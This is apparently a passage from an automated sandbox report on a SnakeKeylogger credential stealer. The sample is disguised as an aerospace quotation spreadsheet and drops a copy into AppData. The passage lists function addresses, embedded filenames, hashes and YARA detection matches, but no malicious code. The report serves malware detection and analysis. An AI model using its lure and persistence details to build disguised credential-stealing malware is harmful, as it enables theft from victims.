                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeCode function: 10_2_011129EC10_2_011129EC
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeCode function: 10_2_0111FA8810_2_0111FA88
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeCode function: 10_2_01113AA110_2_01113AA1
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeCode function: 10_2_055D954810_2_055D9548
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeCode function: 10_2_055D9C1810_2_055D9C18
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeCode function: 10_2_055DE6B010_2_055DE6B0
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeCode function: 10_2_055D502810_2_055D5028
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeCode function: 10_2_055DD55010_2_055DD550
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeCode function: 10_2_055DD54010_2_055DD540
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeCode function: 10_2_055DDDFF10_2_055DDDFF
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeCode function: 10_2_055DDDF110_2_055DDDF1
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeCode function: 10_2_055DFC6810_2_055DFC68
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeCode function: 10_2_055DCCA010_2_055DCCA0
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeCode function: 10_2_055DEF6010_2_055DEF60
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeCode function: 10_2_055D178F10_2_055D178F
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeCode function: 10_2_055D17A010_2_055D17A0
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeCode function: 10_2_055D1E7010_2_055D1E70
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeCode function: 10_2_055DDE0010_2_055DDE00
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeCode function: 10_2_055D1E8010_2_055D1E80
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeCode function: 10_2_055DE6AF10_2_055DE6AF
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeCode function: 10_2_055DE6A010_2_055DE6A0
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeCode function: 10_2_055D296810_2_055D2968
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeCode function: 10_2_055DD99910_2_055DD999
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeCode function: 10_2_055DD9A810_2_055DD9A8
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeCode function: 10_2_055DD9A710_2_055DD9A7
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeCode function: 10_2_055D004010_2_055D0040
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeCode function: 10_2_055D501810_2_055D5018
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeCode function: 10_2_055DF81010_2_055DF810
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeCode function: 10_2_055D000610_2_055D0006
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeCode function: 10_2_055DF80110_2_055DF801
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeCode function: 10_2_055D003F10_2_055D003F
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeCode function: 10_2_055DD0F810_2_055DD0F8
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeCode function: 10_2_055DEB0810_2_055DEB08
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeCode function: 10_2_055D0B3010_2_055D0B30
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeCode function: 10_2_055D932810_2_055D9328
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeCode function: 10_2_055D0B2010_2_055D0B20
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeCode function: 10_2_055D8B9010_2_055D8B90
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeCode function: 10_2_055DF3B810_2_055DF3B8
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeCode function: 10_2_055DF3A810_2_055DF3A8
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeCode function: 10_2_055D8BA010_2_055D8BA0
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeCode function: 10_2_055DE25810_2_055DE258
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeCode function: 10_2_055DE24910_2_055DE249
                  Source: C:\Users\user\Desktop\T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeCode function: 10_2_055DEAF810_2_055DEAF8
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeCode function: 16_2_00DAC14716_2_00DAC147
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeCode function: 16_2_00DAD27816_2_00DAD278
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeCode function: 16_2_00DA536216_2_00DA5362
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeCode function: 16_2_00DAC46816_2_00DAC468
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeCode function: 16_2_00DAC73816_2_00DAC738
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeCode function: 16_2_00DAE98816_2_00DAE988
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeCode function: 16_2_00DA69A016_2_00DA69A0
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeCode function: 16_2_00DACA0816_2_00DACA08
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeCode function: 16_2_00DACCD816_2_00DACCD8
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeCode function: 16_2_00DA9DE016_2_00DA9DE0
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeCode function: 16_2_00DA6FC816_2_00DA6FC8
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeCode function: 16_2_00DACFA916_2_00DACFA9
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeCode function: 16_2_00DAF63116_2_00DAF631
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeCode function: 16_2_00DA29EC16_2_00DA29EC
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeCode function: 16_2_00DA39ED16_2_00DA39ED
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeCode function: 16_2_00DAE97A16_2_00DAE97A
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeCode function: 16_2_00DAFA8816_2_00DAFA88
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeCode function: 16_2_00DA3E0916_2_00DA3E09
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeCode function: 16_2_0651DE0016_2_0651DE00
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeCode function: 16_2_06511E8016_2_06511E80
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeCode function: 16_2_065117A016_2_065117A0
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeCode function: 16_2_06519C1816_2_06519C18
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeCode function: 16_2_0651954816_2_06519548
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeCode function: 16_2_06510B3016_2_06510B30
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeCode function: 16_2_0651502816_2_06515028
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeCode function: 16_2_0651296816_2_06512968
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeCode function: 16_2_06511E7016_2_06511E70
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeCode function: 16_2_0651E6B016_2_0651E6B0
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeCode function: 16_2_0651E6AF16_2_0651E6AF
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeCode function: 16_2_0651EF5116_2_0651EF51
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeCode function: 16_2_0651EF6016_2_0651EF60
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeCode function: 16_2_0651178F16_2_0651178F
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeCode function: 16_2_0651FC5E16_2_0651FC5E
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeCode function: 16_2_0651FC6816_2_0651FC68
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeCode function: 16_2_0651CC8F16_2_0651CC8F
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeCode function: 16_2_0651CCA016_2_0651CCA0
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeCode function: 16_2_0651D55016_2_0651D550
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeCode function: 16_2_0651D54016_2_0651D540
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeCode function: 16_2_0651DDFF16_2_0651DDFF
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeCode function: 16_2_0651E25816_2_0651E258
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeCode function: 16_2_0651E24B16_2_0651E24B
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeCode function: 16_2_0651EAF816_2_0651EAF8
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeCode function: 16_2_0651EB0816_2_0651EB08
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeCode function: 16_2_06510B2016_2_06510B20
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeCode function: 16_2_0651932816_2_06519328
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeCode function: 16_2_06518B9016_2_06518B90
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeCode function: 16_2_0651F3B816_2_0651F3B8
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeCode function: 16_2_06518BA016_2_06518BA0
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeCode function: 16_2_0651F3A816_2_0651F3A8
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeCode function: 16_2_0651004016_2_06510040
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeCode function: 16_2_0651F81016_2_0651F810
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeCode function: 16_2_0651501816_2_06515018
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeCode function: 16_2_0651F80316_2_0651F803
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeCode function: 16_2_0651000616_2_06510006
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeCode function: 16_2_0651D0F816_2_0651D0F8
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeCode function: 16_2_0651295A16_2_0651295A
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeCode function: 16_2_0651D99916_2_0651D999
                  Source: C:\Users\user\AppData\Roaming\WheTgQY.exeCode function: 16_2_0651D9A816_2_0651D9A8
                  Source: T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe, 00000000.00000002.2035924759.0000000002B11000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRemington.exe4 vs T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe
                  Source: T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe, 00000000.00000002.2043259445.0000000007520000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameCaptive.dll" vs T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe
                  Source: T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe, 00000000.00000000.2007231634.0000000000732000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenametsUY.exeF vs T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe
                  Source: T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe, 00000000.00000002.2036673189.00000000043DE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe
                  Source: T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe, 00000000.00000002.2036673189.00000000043DE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRemington.exe4 vs T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe
                  Source: T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe, 00000000.00000002.2044319894.000000000B840000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe
                  Source: T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe, 00000000.00000002.2033422411.0000000000C5E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe
                  Source: T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe, 00000000.00000002.2036673189.0000000003BCB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCaptive.dll" vs T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe
                  Source: T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe, 00000000.00000002.2043053754.0000000007329000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenametsUY.exeF vs T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe
                  Source: T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe, 0000000A.00000002.4484177904.0000000000B57000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe
                  Source: T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeBinary or memory string: OriginalFilenametsUY.exeF vs T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe
                  Source: T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: 0.2.T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe.471ffb0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 0.2.T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe.471ffb0.1.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 0.2.T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe.471ffb0.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 9.2.WheTgQY.exe.411c3d0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 9.2.WheTgQY.exe.411c3d0.1.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 9.2.WheTgQY.exe.411c3d0.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 9.2.WheTgQY.exe.415f3f0.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 9.2.WheTgQY.exe.415f3f0.2.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 9.2.WheTgQY.exe.415f3f0.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 0.2.T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe.471ffb0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 0.2.T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe.471ffb0.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 0.2.T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe.471ffb0.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 9.2.WheTgQY.exe.415f3f0.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 9.2.WheTgQY.exe.415f3f0.2.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 9.2.WheTgQY.exe.415f3f0.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 9.2.WheTgQY.exe.411c3d0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 9.2.WheTgQY.exe.411c3d0.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 9.2.WheTgQY.exe.411c3d0.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 0.2.T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe.4611370.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 0.2.T#U00fcrk Havac#U0131l#U0131k ve Uzay Sanayii A#U015e TEKL#U0130F TALEB#U0130-19-02-2025_xlsx.exe.4698990.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
